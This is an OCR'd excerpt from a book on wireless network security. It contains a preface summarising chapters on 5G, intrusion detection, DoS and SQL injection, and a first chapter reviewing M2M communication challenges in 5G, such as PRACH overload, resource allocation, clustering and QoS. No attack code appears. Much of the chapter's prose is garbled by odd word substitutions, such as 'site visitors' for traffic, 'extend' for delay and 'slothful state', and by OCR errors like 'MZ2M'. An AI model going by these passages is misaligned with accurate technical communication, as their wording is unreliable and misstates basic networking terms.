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Preface 


This book is written to provide the reader with an in-depth understanding 
of all the security issues for wireless networks. The wide scope of knowl- 
edge that this book contains will help the researcher to become acquainted 
with the various aspects of wireless communications. This book discusses 
the security issues in wireless networks for research development. It will 
enable readers to develop solutions for the security threats and attacks in 
wireless communication systems and networks. The book provides the 
most cost-effective solutions to deploy wireless across a large enterprise. 
It discusses financial and technical controls to mitigate the effects of any 
unforeseen risk involved in a large wireless project. 

In Chapter 1, “M2M in 5G Cellular Networks: Challenges, Proposed 
Solutions, and Future Directions,’ 5th Generation wireless networks 
(5G) are defined to meet the requirements of high data rates for thou- 
sands of users, synchronized connections for vast wireless sensor net- 
works, improved coverage area, efficient signal processing, low latency and 
enhanced network spectrum as compared to the 4th Generation wireless 
networks (4G). 

Chapter 2 discusses Media access control (MAC), one of the sub-layers 
of the data link layer (Layer 2) in OSI (open systems interconnection) 
model. MAC layer provides a unique id and controls the access mecha- 
nism of channels in order to interface with other nodes over shared chan- 
nel by using MAC protocol. MAC address is very helpful for delivering a 
data packet over an electronic network, which is not possible in the case of 
postal address. 

Chapter 3 is “Enhanced Image Security through Hybrid Approach: 
Protect Your Copyright over Digital Images.” The security of the water- 
mark against unauthorized detection is a major point of concern. If some 
illicit user can detect the watermark from the watermarked image then he 
can very easily remove that watermark by making the image copyright-free 
or he may also remove the originally embedded watermark and insert his 
watermark. 


xiii 


xiv PREFACE 


Chapter 4 discusses Quantum Computing. Quantum computers can 
bring about development in various fields like science and medicine that 
could save lives. Quantum computing can be instrumental in the advance- 
ment of machine learning so that illness can be diagnosed very quickly. 
With its help, materials can be discovered so that efficient structures and 
devices can be made. It helps to bring about development in financial strat- 
egies so that one could lead a better life in retirement. 

Chapter 5, “Feature Engineering for Flow-based IDS,’ discusses Network 
Security, Intrusion Detection System, Feature Engineering, Feature 
Selection, Net flow, Flow-Based Intrusion Detection System, and IP flow. 

Chapter 6, “Environmental Aware Thermal (EAT) Routing Protocol for 
Wireless Sensor Networks,’ discusses Wireless Sensor Network (WSN) as 
one of the emerging technologies of the 21st century due to its growing 
demand in automation. WSNs are organized in large environmental areas 
and there are more chances for the sensor nodes to get affected because of 
external temperature. As the environmental temperature rises, the lifetime, 
quality of service and temperature of sensor nodes are easily influenced. 
Thus Environmental Aware Thermal (EAT) routing protocol is intro- 
duced to minimize the issue. In this protocol, the incoming data signals 
are assigned with normal, abnormal and critical priority levels. It consists 
of three potential fields such as environment, energy and quality of service. 

Chapter 7 “A Comprehensive Study of Intrusion Detection and 
Prevention Systems,” presents the following: A computer network is sim- 
ply an interconnection of several computers that follow common commu- 
nication protocols. As network intrusion has been increasingly affecting 
organizational systems and crucial data, it is imperative that there exists an 
effective network security system in place. This is where the role of a sound 
intrusion detection system becomes important in an era where attempts 
at unauthorized access have become the norm rather than the exception. 

Chapter 8, “Hardware Devices Integration with IoT,” discusses the BLE, 
LPDDR, REST, HTTP, WiMAX, and GPIO. 

Chapter 9 is “Analysis on Denial of Service (DoS) Attacks and Their 
Countermeasures.” Denial of Service (DoS) are some of the most expensive 
and threatening cyberattacks that exist on the internet. Their main aim 
is to restrict the users/victims’ access to a specific resource. This chapter 
comprises all ideas, classification, and solutions to the DoS attack. DoS 
compromises the availability goal of the CIA triad. Topics discussed are 
DoS, CIA triad, TCP SYN, UDP, Zombies, VANET, IoT, and Post-Attack 
Forensics. 

Chapter 10, “A Practical Implementation of SQL Injection Attack,” dis- 
cusses SQL Injection, and SQL Injection Vulnerability. 
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Chapter 11 is “Machine Learning Techniques for Face Authentication 
System for Security Purposes.” The modern world is rapidly revolutioniz- 
ing the way things work. Everyday actions are being handled electronically. 
Based on this, a sub-division of application in recognition, specifically face 
recognition, emerged. Face recognition is a technology capable of verifying 
the identity of an individual using their face from a digital frame against 
a database. It has been one of the most captivating and prime research 
fields in the past few decades. The motivation came from the need for auto- 
mated recognition and verification. Compared with traditional biometric 
systems, i,e., fingerprint recognition, iris recognition, face recognition has 
numerous advantages, not just limited to “no-contact” and “user friendly”. 

Chapter 12, “Estimation of Computation Time for Software-Defined 
Networking-based Data Traffic Offloading System in Heterogeneous 
Network,” notes that the approach of data traffic offloading methodolo- 
gies is likely to improve the quality of mobile service to address the issue 
of insufficient bandwidth due to the rapid growth of cellular data traffic. 
To measure the real-time performance of Software-defined networking 
(SDN) based offloading systems, computing the response time is essential 
to consider. 
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Abstract 

Fifth-generation wireless networks (5G) are defined to meet the requirements of 
high data rates for thousands of users, synchronized connections for vast wireless 
sensor networks, improved coverage area, efficient signal processing, low latency 
and enhanced network spectrum as compared to the fourth-generation wireless 
networks (4G). These networks were initially envisioned for efficient and fast 
mobile networks along with converged fiber-wireless networks. However, with 
the explosion of smart devices and emerging multimedia applications the need 
to roll out 5G networks to meet the demands both at the consumer and busi- 
ness end became necessary. Therefore, to create a network with faster speed, the 
5G networks have initiated a new basis for communication, which consists of 
the Internet of Things (IoT) and Machine-to-Machine communication (M2M). 
The IoT and M2M have been able to overcome the major limitations of 5G to 
initiate multiple-hop networks, making available high data rates to peers between 
several base stations and thereby reducing costs and initiating reliable security 
standards. Such a major deviation from the conventional design to involve large 
networks to support massive access by machine-type devices (MTDs) sets special 
technical challenges for M2M. This chapter offers an outline of the main issues 
raised by the M2M vision along with a survey of the common approaches pro- 
posed in the literature to enable the coexistence of M2M devices and the chal- 
lenges which need to be investigated. 
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2 WIRELESS COMMUNICATION SECURITY 


1.1 Introduction 


Every five years or so, enormous changes occur in cellular networks with 
the already existing generation networks in order to fix the faults of its 
predecessor networks. The 4G network was needed to make consuming 
data less of an unpleasant experience. However, it had its flaws, which were 
fixed by the emergence of 5G, which created a big change in the mobile 
networks. With the ever-growing count of wireless users, telecom tech- 
nologies continued to develop speedily, supporting the growth of service 
capacity and coverage to fulfill user demand for higher data. But the con- 
cerning issue with current network standards is a serious lack of bandwidth 
which limits support of higher data networks. Due to this issue, radio spec- 
trums on which the 4G networks operate are overcrowded and thereby are 
predicted to increase mobile traffic between 2010 and 2020 [1]. This being 
one of the major challenges, the telecom businesses are depending on 5G 
as an existence investor considering growing marketplace overthrow via 
internet groups. Attempts are being made via the telecom companies to 
outline 5G technological know-how that gives record transmission veloc- 
ity of 10 gigabytes over the air [2], latency in the order of 1ms [3] and IoT 
units which run on a battery lasting for up to 10 years [4, 10]. 

In contrast to the 5G network, the contemporary vision of communica- 
tion systems in the new business areas like car—satellite communications, 
home automation, health security remote controlling, smart cities, Mobile 
POS, etc., require complete automated communication without human 
intervention. Such a novel form of communication is referred to as M2M 
communications. M2M visualizes a scenario where equipment on both 
sides have tens or hundreds of antennas or even more that renders better 
data rates for users with efficient energy and spectrum. It serves as the key 
element in the emerging of Internet of Things and Smart City models [5] 
and [6], which are planned to provide solutions to present and upcoming 
socioeconomic necessities for tracking and monitoring services, as well as 
for novel applications and advanced business setups [7]. 

The basic idea of M2M is to enable direct communication between users 
and the devices without the occupancy of the core network elements which 
requires offloading of the networks thereby exploiting the physical proxim- 
ities of the terminals. Even with the call for such solutions, the potential of 
M2M can be set free only if the connectivity of the Machine-type Devices 
(MTDs) is probable everywhere without employing additional devices and 
without (or with minimal) configuration. In this point of fact, the ideal sit- 
uation should be such where the MTDs are ready to be connected with the 
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rest of the world by placing it in the favorable position. Figure 1.1 describes 
the ways of connectivity in the M2M communication with three cases. 

With specific instances of M2M connectivity new applications with 
international offerings are connecting a number of kinds of embedded 
Wi-Fi machines/devices to create an unexpectedly developing IoT which 
guarantees to expand boom and income possibilities for modern-day 
carriers in the facet of waning margins in hooked up strains of business. 
Including the IoT applications, the M2M links the networks in many 
ways, providing an optimal form of connectivity with the Machine-Type 
Communications (MTCs), enabling: faraway industrial manage structures 
(ICS); security metering monitoring of transportation; third-party video 
streaming and gaming content; voice signaling; e-healthcare emergency 
monitoring and metering; domestic and industrial automation and a lot 
more. Figure 1.2 indicates a range of functions of the M2M conversation at 
a variety of grounds of growing a big ad hoc network permitting close by 
units to connect. 

Unfortunately, due to the massive accesses and high user demands 
the technologies that are supposed to carry out MTC are somewhat not 
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Figure 1.1 Cases for M2M connectivity. (a) Basic M2M connectivity, (b) M2M in which 
a single application shares information with of group of similar devices, and (c) M@2M 
communication using the gateway device [8]. 
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Figure 1.2 Applications of M2M communications [9]. 


capable to meet the demands for ubiquitous coverage of M2M communi- 
cations. This ubiquitous access offered by satellite connections has prohib- 
itive costs, posing major challenges when used in indoor environments. 
This therefore calls for the radio technologies which are capable of mak- 
ing available extensive coverage area with low power consumption and 
reduced cost. At the same time operation of such a new infrastructure net- 
work at a diverse scale makes it an economically challenging task, thus 
making it necessary to add the MTC devices in the services of the existing 
communication networks. 

Consumer attitude to usage of internet is altering due to the alteration in 
the tendencies. Such user demands can only be fulfilled by the widespread 
mobile network supporting the M2M communication offering higher effi- 
ciency, security and robustness. Current standards being designed to pro- 
vide access to only a small count of devices are likely unable to cope with 
the expected growth in the traffic of the M2M communication networks, 
thereby becoming a major challenge for the 5G networks [8]. Due to this 
reason the major focus is to enforce the M2M services as shown in Figure 
1.2, which involve myriad devices generating efficient periodic transmis- 
sions of short data, predicted to play a major role in the future networks. 

This chapter surveys the major challenges presented to the wireless cel- 
lular network standards by the massive M2M services. Section 1.2 is the 
literature survey giving the current standards for enabling the M2M ser- 
vices. Section 1.3 addresses in greater detail the challenge of the same with 
their proposed solutions to fill the gaps in the future to fully support M2M. 
Section 1.4 concludes this chapter with the final reconsiderations. 
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1.2 Literature Survey 


Researchers have predicted that more than a billion devices will con- 
nect with the M2M communications through mobile networks by 2020. 
Statistics show that the world cellular site visitors will experience increase 
around 70% with 26% smartphones accountable for 88% of whole cell facts 
visitors [9]. The current 4G mobile structures fail to aid this huge scale of 
information utilization when you consider that they had been in the begin- 
ning deliberate to keep up to 600 RCC related customers per cell [10, 11]. 
Relatively M2M communications and IoTs subsidize thousands of linked 
devices in a one cell. This makes the aforementioned essential to support 
the standards to enable the M2M communications. 

The authors in [12] differentiated the M2M communications from 
mobile Human-based (H2H) because the H2H traffic (browsing, file trans- 
ferring, video streaming) cannot be directly applied to the M2M [12, 13], 
mentioning the M2M traffic direction as uplink whereas the H2H traffic 
direction as downlink. The M2M applications duty-cycled with short con- 
nection would promise fast access to the M2M network, resolving major 
traffic problems in the M2M communications due to H2H traffic. 

Due to increased H2H and M2M traffic, the Wi-Fi communications 
can't chorus from dealing with the new challenges of radio spectrum con- 
gestion. In [14], the authors surveyed to provide complete investigation of 
the M2M fading channels in coordinated and cooperative networks under 
the propagation conditions of the line-of-sight (LOS) and non-line-of- 
sight (NLOS). The survey evaluated the performance of dual-hope-relay- 
systems with equal gain combining which improved the overall system 
performance of LOS components in the transmitting links [14]. Apart 
from the radio spectrum congestion, current research studies defined the 
problems faced by means of M2M gadgets such as channel instabilities 
[13-15] and noise acquaint with coordination uncertainties in the media 
access. Researchers explained that this unreliable processing and transmis- 
sions in the communication medium leads to data loss causing a major 
M2M failure, thereby stating reliability as an unresolved challenge for the 
M2M standards [16]. 

Also, with the rapid rise in the number of wireless users there is a 
notable increase in the concurrent accesses, making simultaneous access 
increase, causing extra packet collisions due to interference resulting in 
data loss. Thus, maximizing the uplink channel and optimizing the radio 
aid allocation elevated the overall performance with environment friendly 
Quality of Service (QoS). Along with dependable QoS, M2M units are 
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designed in such a way that they are normally less expensive and small 
in dimension with energy, bandwidth and different storage constraints to 
communication. The networks on which these M2M units work provide 
extensive insurance areas with excessive statistics charges and diminished 
latency, however, in spite of the certain advantages. There are many more 
challenges to the M2M networks which have been specified in [15, 17]. The 
study in [18] testified that the M2M traffic in the presence of 4G traffic is 
not to be considered negligible, hence degrading the performance of the 
4G networks in terms of QoS. Thus, the operation of M2M has to be seam- 
less, ie., besides human intervention stopping occasional physical attacks 
[15, 16, 19, 20]. This attainable success of the M2M functions overcoming 
all these challenges can promise to extend the miscellany and wide variety 
of the units to be related and the visitors in the upcoming years. So, the 
present research is focusing on enhancing the overall performance and the 
performance of the system, both in phases of energy consumption, affec- 
tivity or delay. 

Moreover, further improvements supporting the M2M communica- 
tions have been stated by the authors in [21] analyzing sensor-to-gateway 
communications in terms of delay and energy efficiency in wireless M2M 
introducing the contention-based MAC protocols. The study defined the 
use of gateways in the wireless M2M network driving a large number of 
devices that regularly wake their radio interfaces to the gateway carrying 
out high data rates with low latency. This use of gateways is supposed to 
reduce the number of devices to be accessed, thereby making the trans- 
mission less complex and reducing interference with increased efficiency. 

Other authors in [22] have explained the idea of Clone-to-Clone (C2C) 
to solve the issues obstructing the development of the next generation 
applications by reducing the traffic, recovering overall network perfor- 
mances and mitigating the power consumption of the devices. The concept 
of Energy Efficient and Reliable (EER) and Green Allocation with Zone 
Algorithm (GAZA) to achieve overall power and energy efficiency, for reli- 
able M2M communication has also been stated in [23]. 

With the sudden advancements in user-supported communication 
including E-health, security and surveillance, industrial and energy, one 
of the crucial areas in need of the M2M devices’ communication is the 
intelligent transportation systems (ITS). The key component of ITS, the 
Vehicular Ad Hoc Networks (VANETS), are created and connected by 
the mobile and hoc networks (MANETS) for the impulsive creation of 
the wireless networks for data sharing. Emphasis on the same has been 
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made to define the M2M vehicular networking with the standardization 
of communication interfaces as a major challenge with high mobility and 
variability of components [24]. Furthermore, the data aggregation strate- 
gies which can be delivered for channel get admission to enhancements in 
M2M communications for mobile networks, mentioning the use of pro- 
long to enhance uplink transmission affectivity, has been described in [25]. 
In addition to this, the world extend would reduce with the acceleration 
in quantity of the M2M devices. An extra scheme being cited to decrease 
extend or to acquire greater power and energy consumption affectivity 
is the transmission scheduling method [26]. The overview of the already 
existing scheduled airliners as relays between ground devices and satellites 
offering a new M2M infrastructure has been discussed in [27]. 

M2M communications cannot be reliable if the mobility, delay patterns 
and most specifically energy efficiency is not met [16]. This is usually at 
the time of using radio technologies for communications due to lower 
available bandwidth, higher link failure, and higher energy consumption. 
Finally, the future works will likely be to combine a range of strategies 
(transmission scheduling schemes, data aggregation, gateways) to mini- 
mize the quantity of indispensable records to be transmitted. Managing 
security and privacy in such a vivid network (M2M) obviously requires 
good attention, making M2M communications more efficient. 

Summarizing the current M2M standards that have supported to enable 
the M2M communications, the next section describes the challenges which 
need to be overcome along with their proposed solutions. 


1.3. Survey Challenges and Proposed Solutions 
of M2M 


With the explosion of M2M and IoT applications, large tech companies are 
jumping on board with devices ranging from wearable to beacon modules. 
There are many considerations which need to be taken into account for the 
deployment of M2M and IoT technologies. So it becomes mandatory to 
study the challenges and the interference from each aspect, from cost and 
power to long-term product life cycle of the M2M devices. The challenges 
to enable the M2M communications include small-sized data transmis- 
sions supported by larger value of devices after regular and irregular inter- 
vals; high reliability, low latency and low energy consuming mobile profiles 
assuring that regular H2H traffic is not disturbed by the M2M traffic. 
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1.3.1 PARCH Overload Problem 


The Random Access Channel (RACH) process is one of the key challenges 
[28] for M2M. This is because of the traffic load caused by a rapid rush of 
myriad M2M devices trying to access the base station at the same time. 
According to the latest M2M traffic surveys, approximately 3.2 billion cel- 
lular-based M2M devices are expected to join the network in 2024 [29] 
making Quality of Service (QoS) provisioning an important challenge [30] 
for the M2M communications. 

The rush to access Physical Random Access Channel (PRACH) 
resources are likely to debase the M2M services. The enormous access calls 
by M2M devices burden the PRACH, resulting in access delay and failure 
rate. This traffic load can be reduced by multiplying the number of access 
devices scheduled per frame, but this further introduces a new challenge 
of reduced capacity for the devices. Thereafter, it becomes important to 
deduce schemes to overcome this overload problem. The author in [10] has 
forwarded various methods which include the isolation of the M2M and 
Human-2-Human (H2H) services by simply splitting the two or by making 
the two services share the same resource, giving them a combined name of 
Hybrid schemes. Apart from this, there are various other approaches that 
have been put forward to offset PRACH overload [31]. 


e Pull-based scheme: This is a central scheme which permits 
the MTDs to access the PRACH paged by the eNode (eNB) 
[31] keeping an account of the network load conditions to 
prevent overloading problems. With this approach the net- 
work channels can be managed having regular traffic pat- 
terns using a single server. However, being managed by a 
single M2M server the scheme cannot deal with unexpected 
flow of MTD access requests. 

e Resource separation: The Resource separation scheme pro- 
vides the simplest and most instant way to protect H2H 
devices from the risk of collisions due to diverse MTC 
requests by assigning orthogonal PRACH resources to H2H 
and M2M devices. The separation of resources can be done 
either by splitting the H2H and MTC devices into groups, or 
by simply allocating them different RA time/frequency slots 
[31]. To get a better effect, coupling with mechanisms which 
dynamically shift the resources among the two classes in 
accordance to the required access request rates is mandatory. 
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¢ Back-off tuning: Another scheme to clear the congestion 
caused by the traffic of requests in a smooth way is by assign- 
ing the back-off intervals to the MTDs which fail the trans- 
mission in RACH procedures [31]. Though the collisions 
between H2H and M2M devices can be improved efficiently, 
due to instability issues initialized by the ALOHA-like mech- 
anisms this scheme is really not effective when dealing with 
stationary MTDs massive access. 

e Access Class Barring (ACB): The above stated back-off 
tuning mechanism is a generalization of the Access Class 
Barring (ACB) method. The ABC scheme has each class 
allotted with an access probability with a barrier time [31] 
making it possible to define several access classes with 
dissimilar access probabilities. The access of the device is 
debarred, making the device wait for a random back-off time 
when the Message transmitted in the RA slot is larger than 
the access probability factor. Another scheme of Extended 
Access Barring (EAB) was projected that can withstand lon- 
ger access delays [31], hence barring the device without the 
need of any new access class. This technique makes it pos- 
sible for the MTDs to mitigate the massive access issue by 
simply labeling them as an EAB device. Thus ACB can prove 
to be quite useful in avoiding the overload problem but only 
with respect to longer access delays for the MTDs, whereas 
it fails in the case of contention-based access events like fire 
alarms due to power failures or any other unexpected event 
which require short time intervals. 

e Self-Optimizing Overload Control (SOOC): In [28] the 
authors presented a complex scheme, i.e., SOOC, to offset 
PRACH overload by simply merging the pull-based, back- 
off, ACB, including the resource separation scheme. The 
primary feature of this scheme is the implementation of the 
control loop to collect information for overload examining 
at every RA cycle. Basically, the device enters the overload 
control mode and the classical p-persistent mechanism is 
applied for the regulation of RA cycles when it is not able 
to receive an access grant at the first attempt. Also, to dif- 
ferentiate between time-tolerant MTDs and time-sensitive 
MTDs, two access classes, namely low access priority and 
high access priority have been added in this scheme for the 
M2M devices. Though handling high traffic loads can be 
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attained using this scheme the author in [28] has not pro- 
vided enough evidence relating to the performance of this 
scheme. 

e Bulk MTC signaling scheme: Another scheme in [32] pro- 
vided a further solution to overload problems by enabling 
bulk MTC signal handling stating lack of mechanisms while 
handling overheads generated from collective MTDs. This 
overhead can be reduced at the Base Station by making use of 
bulk processing (collecting signal data coming from MTDs 
before accelerating them to the core network). As an illus- 
tration for this scheme, consider a group of MTDs which 
are triggered to send Tracking Area Update (TAU) where 
the Base Station has to wait for a default timeout interval 
or awaiting the time it has gathered enough information to 
forward a message towards the Mobility Management Entity 
(MME). Since the MTDs are linked to the same MME, 
the TAU messages are going to be different on the MME 
Temporary Mobile Subscriber Identity (M-TMSI). A situa- 
tion where an average of 20 TAU msg/sec with a period of 
10 s, 200 TAU messages can be combined in a single 1211 
bytes/msg in contrast to which an individual message would 
acquire up to 4500 bytes of space. Hence the approach in this 
scheme can reduce the intensity of traffic produced by large 
channel access. 


1.3.2 Inefficient Radio Resource Utilization and Allocation 


The existing cellular standards are not capable of handling large number 
of devices with small small-sized payloads, leading to network congestion. 
This makes it important for the existing mobile networks to be amended for 
supporting diverse M2M devices ensuring efficient allocation and utiliza- 
tion of the radio resources. Hence, novel methods are introduced to man- 
age the overload issues such as back-off adjustment, M2M prioritization, 
etc. In radio access network and existing networks need to be improved to 
guide various M2M gadgets in the future [19]. The reality is that cell radio 
sources are narrowly accessible and an environment-friendly operation 
of such radio resources for M2M desires would be guaranteed. This envi- 
ronment-friendly utilization of confined radio assets has to be executed 
or the overall performance of M2M will probably degrade. Therefore, this 
theme needs vital attention to keep away from the congestion troubles in 
the M2M offerings effectively. Figure 1.3 suggests the instance of the useful 
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Figure 1.3 Radio resource allocation in existing mobile standards [23]. 


resource allocation in present-day cell guidelines that are neither meant 
successfully to manipulate small statistics contents nor can take care of 
myriad gadgets concurrently [23]. 

The main issue in the case of dissimilar traffic is the management of 
interference, which needs a complex resource partitioning mechanism. 
A coordinated radio resource allocation is being enabled by partitioning 
among different devices which reduces the congestion problems to some 
extent. A number of scheduling algorithms were proposed by authors to 
estimate the performance in terms of throughput and equality between the 
mobile users [27]. Figure 1.4 represents the resource scheduling mecha- 
nism which supports M2M communication. 

The aforementioned proposed approaches consisting of the self- 
organizing mechanisms with minimal phone transmitting strength to 
make use of frequency reuse patterns offer a solution for interference as 
properly as most useful frequency reuse [28]. To guide the M2M traffic 
[29] different scheduling schemes have been additionally advised which 
think about the community environments as properly as delay limitations, 
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maximizing the count of sustained units per cell. Henceforth, perfor- 
mances of the aforementioned mechanisms are fairly favorable at the stake 
of immoderate signaling overhead [30] which will be the one of the most 
tedious issues in the future too. 


1.3.3 M2M Random Access Challenges 


Non-wired access might also be dependent totally on restricted wireless 
networks (ZigBee, Wi-Fi, etc.) or inclusive range cell networks (GSM, 
GPRS, UMTS, and LTE). Even though wired access strategies are extra reg- 
ular in originating much less prolonging and supplying greater throughput, 
these methods honestly are no longer appropriate for all M2M purposes 
which are brought about by using elements such as mobility, scarcity of 
scalability and price competence. Hence these are the instances where non- 
wired networks play a necessary part. The different non-wired admittance 
is employed for constrained vary hyperlinks which are now not expensive, 
accessible, and consume much less energy. However, these hyperlinks are 
inappropriate for M2M communications because of low statistics rates, 
excessive interference, weaker security, and much lower mobility. 


¢ Quality of Service: Interference is probable to take region 
so the M2M and H2H site visitors contest for PRACH 
resources. Though, the overall performance of H2H visitors 
ought to now not be affected; therefore M2M/MTC visitors 
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have to meet QoS. Also, most promising decision of trans- 
mission mode is need of appropriate QoS which must have 
small delays mainly in emergency and greater data charges, 
e.g., surveillance applications. 

e Cognitive M2M communications: Primary challenge is 
constantly growing signaling overhead due to the fact of 
giant consumer connectivity with M2M units per cellphone 
inflicting bandwidth issues. This bandwidth trouble on the 
other hand should be resolved via common strategies, i.e., 
by growing the range of eNBs. Another associated difficult 
project is the interference in the middle of the MTC and 
non-MTC units which ought to be extended with the aid 
of centralized coordination; however, this will increase the 
common complexity. Thus, the exceptional ideal approach 
would be imposing allotted supply administration which 
may additionally become what may be useful for lowering 
the interference between positive gadgets [33]. Furthermore, 
a higher thinking for a significant range of gadgets to join 
per mobile, i.e., the random get entry to mechanisms build- 
ing the MTC and non-MTC expedients to section the simi- 
lar restricted radio spectrum has been provided. 

e Collective (Group-based) M2M communication: The main 
challenge for this mechanism is to allocate slots where group- 
based conversation performs a vital function [34]. Its major 
goal for this mechanism is to reduce the signal blockading 
on air interface. Additionally, in order to limit the com- 
munity blockading risks, the energy intake of gadgets can 
additionally be deduced. The truth is that machines require 
send/receive statistics to/from a neighboring factor the place 
grouping of the MTC gadgets needs exclusive attention. The 
requirement of the logical/physical attribute primarily based 
on QoS and extra MTC traffic elements [35] for such a kind 
of conversation enabling the M2M. 


1.3.4 Clustering Techniques 


Various clustering techniques making allowance for priorities and delay 
restrictions to handle massive access have been introduced supporting the 
maximum number of devices to be connected in the M2M network. Figure 
1.5 is an example of the clustering technique in the M2M networks. 
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Clustering Mechanism in M2M Devices: In a clustering 
mechanism all devices in a network are associated with one 
or more groups on the basis of their geographical location 
with regard to the QoS requirements [34]. The clustering 
scheme is, however, beneficial in minimizing the energy 
consumption for MTDs [36] which reduces the risk of net- 
work collisions. Another scheme which has been proposed 
is the dynamic radio resource allocation in which an eNB 
allocates PRACH resources among the MTDs on the basis 
of PRACH traffic load in that particular network [37], hence 
enabling this clustering mechanism. 

Energy efficient clustering of MTDs: Another way to control 
the network cognition is by appointing nodes to the Base 
Station known as cluster-heads which can limit the number 
of requests at the Base Station. The risk of cognition due to 
massive access could also be reduced by selecting the coor- 
dinators which can again help in reduced power and energy 
consumption. More schemes for this massive access man- 
agement and power efficiency are combined by the author 
in [36] where the author has forwarded the idea of N MTDs, 
which are employed in a single cell centered at the Base 
Station maximizing the energy efficiency of the MTDs. 
QoS-based clustering technique: Clustering is being used 
as an effective remedy for the massive assignment of large 
number of MTDs having small transmission and distinct 
QoS requirement to a radio resource [34, 38]. In this the 
devices are grouped depending upon their arrival rates, 
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which helps in forming clusters of the devices having simi- 
lar QoS requirements proving to provide efficient power and 
energy consumption. 


1.3.5 QoS Provisioning for M2M Communications 


QoS provisioning is the most important requirement of a telecommuni- 
cation system. It is an arrangement of service-linked chores related to the 
facility supplier to provide a desirable service to the consumer [39]. It is a 
challenging situation for the operators/service providers on the grounds 
that M2M functions cover a huge range of tasks relying upon data/packet 
size, precedence of the tasks, delay, and mobility demands. Also, some of 
the examples which contain M2M traffic like emergency alerting, unin- 
tentional and/or integral e-healthcare information, are extend touchy and 
demand strict precedence, which makes it essential for the M2M site visi- 
tors no longer to create much delay. By the emergency alerting techniques, 
the site visitors generated by applying point of sale terminals claim low 
priority; as a result it should be referred to that smart metering, track- 
ing and monitoring home equipment create constant site visitors outlines, 
thinking about low priority site visitors but with higher information charge 
necessities. Table 1.1 provides information relating the class types of QoS 
for M2M communications. 


Table 1.1 QoS class types for M2M communications [40-42]. 


Purpose Health Security | IP Multimedia | Video Home Security 
Remote Subsystem Streaming, Automation | Metering 
Control & & Wireless Video Tracking 
Maintenance Point on Signaling 
Sale (POS) 


Features High Reliability | High Security | Access Increased Low Error 
& Access & Privacy Priority Security Rate 
Priority & Low 
Latency 
Traffic Random Random Random Random Regular 
Type Real Time Real Time 
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1.3.6 Less Cost and Low Power Device Requirements 


The technical issues are summarized in [43]; an ambiguity that operators 
want to tackle is how to charge the user for M2M services. A primary M2M 
machine claims low rate and low energy usage. Moreover, the gadgets that 
act as transmitters for different customers utilize their personal sources 
such as battery, data storage and bandwidth, which insist on essential pric- 
ing models to be considered to encourage users to take part in such com- 
munication. It is predictable that M2M equipments/devices will be used 
for a lengthier time period, which will indirectly end up a difficult chore 
for component agencies as well as for the facility suppliers. Additionally, 
because of longer inter-arrival instances users ought to deplete usually time 
in their slothful state. This idle state is essentially a short energy usage state 
in which gadgets commonly save battery while keeping them in sleeping 
modeor wake up at particular instances to take a look at machine statistics 
(SI) replace [44]. Therefore, the key idea is to mend the battery epoch to 
average the endeavor of the slothful mode which can be without problems 
sustained the use of the paging cycles which ought to now not be regular. 
This is due to the motive that the gadgets have to be in lively mode only if 
there is any information to transmit. Table 1.2 shows optimization of the 
low price and low power for environment-friendly MZ2M communications. 
Thereafter these devised mechanisms result in low power devices which 
themselves help in a way to reduce the cost of the services. 


Table 1.2 Optimization of low-cost and low-power M2M devices [43, 45, 46]. 


Release 13 
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Complexity 


Transmitting 
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1.3.7 Security and Privacy 


M2M security is majorly emphasised in consumer characteristics and their 
communications which consist of authority, integrity, authenticity and 
secrecy. Therefore, to enable client acceptance the privateness of M2M is 
vital [47]. Diverse sectors such as e-health, smart metering, industrial and 
energy, transportation logistics, etc., can also have special private necessi- 
ties which have to be viewed at the initial stages of the designing. 

Due to the fusion of diverse heterogeneous networks, MZ2M communi- 
cations are required to address all the threats while communicating with 
different network-based communications criteria. Even then, it is never 
to be supposed that M2M haven't prompted new threats. These are prone 
to be amplified the present ones within the M2M environment and these 
threats will also cause money losses and in addition to this cause a threat 
to human lives indirectly. M2M devices are mainly deployed in amicable 
locations and probably work for prolonged periods. Therefore, numer- 
ous physical attacks will pretense alongside the devices. The following are 
major categories of attacks in case of M2M, pictorially shown in Figure 1.6, 
and their probable solutions are shown in Figure 1.7. 

It is the most required feature of any communication system that per- 
sonal information must not be disclosed at any cost. Otherwise, it can 
create a huge loss either in terms of personal assets or corporate ones. In 
M2M, it is important to accomplish the obligation of secrecy due to the 
existence of smart things, which indirectly create a threat of mishandling 
of technology. The massive number of smart things creates a gigantic chal- 
lenging concern to preserve the seclusion of private data. One of the cri- 
teria is to launch a third-party reliable security association, which will be 
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Figure 1.6 Represents the diverse types of attacks likely to occur while M@2M 
communication. 
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Figure 1.7 Probable solutions for M2M security issues. 


responsible for endorsement distribution. Conversely, if there are a huge 
number of M2M devices with different applications, this scheme appears 
to be too pricy to be applied. Due to this constraint, a lightweight cryp- 
tography technique is preferred in M2M communications. Asymmetric 
and symmetric keys authentication can also be applicable in a variety of 
deployment situations of M@2M communications. 


1.4 Conclusion 


The current cellular systems have not been planned to support the M@2M 
networks; however, these systems are capable of supplying the present-day 
demands and the user approaches for the M2M services. Furthermore, if 
the M2M market is able to fulfill the demands of the user and networks 
these technologies will hit the present networks with the biggest change. 
The evolution of the M2M applications in future is more likely to rely upon 
a mix of proprietary technologies, clearly intended for MTD connectiv- 
ity. Considering that M2M devices and applications remain equipped for a 
long time with minimum intervention and maintenance, the M2M archi- 
tectures is most likely to last for many years to come, and will be finally 
absorbed via 5G, that are concentrating greater to dominate non-cellular 
technologies which are in basic terms advocated for the future M2M ser- 
vices. Mobile M2M communications are being targeted due to their func- 
tionality in a number of purposes like healthcare, transport structures or 
telemetry and additionally due to the surfacing of IoT. A major challenge 
confronted by way of cell M2M networks is to help limitless units with 
smaller payloads inflicting inefficient use of PRBs (Physical Resource 
Blocks) and for this reason resulting in immoderate signaling overhead 
and an elevated chance of community jamming. Future work will center 
extra attention on enhancement of overall performance, each in terms of 


M2M IN 5G CELLULAR NETWORKS: A REVIEW 19 


useful resource utilization effectively and delay. In addition, appropriate 
traffic and models with precise battery lifetime need to be worked upon 
for coming near applications. Methods for improving overall performance 
have to provide for all the probabilities, such as analytical modeling, device 
stage simulations, and hybrid techniques. Besides this, the most vital soft- 
ware is inspected for much less strength consumption including operations 
of battery-driven units in the scenarios; the place there is both no energy 
supply or restricted direct strength supply which can help in electricity 
management in M2M conversation networks. 

Future scope: The spectrum of the cellular networks nonetheless con- 
tinues to be a paucity resource; consequently there is an urge to graph out 
new thoughts for new site visitors types so as to successfully use the band- 
width. Finally, for efficient, optimized and reliable communication all the 
above-stated challenges need to be worked upon, including the challenges 
for complete the end users right from regulation of organizations, com- 
panies of network tools and consumer devices, network operatives, to the 
application sources. 
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Abstract 

